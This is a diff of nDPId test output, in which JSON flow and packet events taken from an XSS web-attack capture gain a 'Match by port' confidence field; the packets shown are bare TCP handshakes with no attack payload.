 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347253445,"flow_last_seen":1499347253445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253445,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1499347253445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347253445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uoZAAD4GC0qsEAABwKgKMte6AFBXtER6AAAAAKACchDqlAAAAgQFtAQCCAoBOf78AAAAAAEDAwc="}
@@ -884,17 +884,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1499347262289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347262289,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ic9AAD4GPAGsEAABwKgKMtgYAFBS2I5QAAAAAKACchCcmQAAAgQFtAQCCAoBOgefAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":2,"flow_last_seen":1499347262289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347262289,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2BhB\/tqnUtiOUaAScSCj2QAAAgQFtAQCCAoD49kVAToHnwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2453,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":3,"flow_last_seen":1499347262290,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347262290,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0idBAAD4GPAisEAABwKgKMtgYAFBS2I5RQf7aqIAQAOVC4QAAAQEICgE6B58D49kV"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347263542,"flow_last_seen":1499347263542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347263542,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1499347263542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347263542,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VDNAAD4GcZ2sEAABwKgKMtgmAFA8SlzqAAAAAKACchDjRQAAAgQFtAQCCAoBOgjZAAAAAAEDAwc="}
@@ -924,15 +924,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1499347272469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347272469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wnhAAD4GA1isEAABwKgKMtiGAFBxpNPoAAAAAKACchAt1gAAAgQFtAQCCAoBOhGQAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":2,"flow_last_seen":1499347272469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347272469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2IbhJKqDcaTT6aAScSC8IQAAAgQFtAQCCAoD4+MHAToRkAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":3,"flow_last_seen":1499347272470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347272470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wnlAAD4GA1+sEAABwKgKMtiGAFBxpNPp4SSqhIAQAOVbKAAAAQEICgE6EZED4+MH"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347273742,"flow_last_seen":1499347273742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347273742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
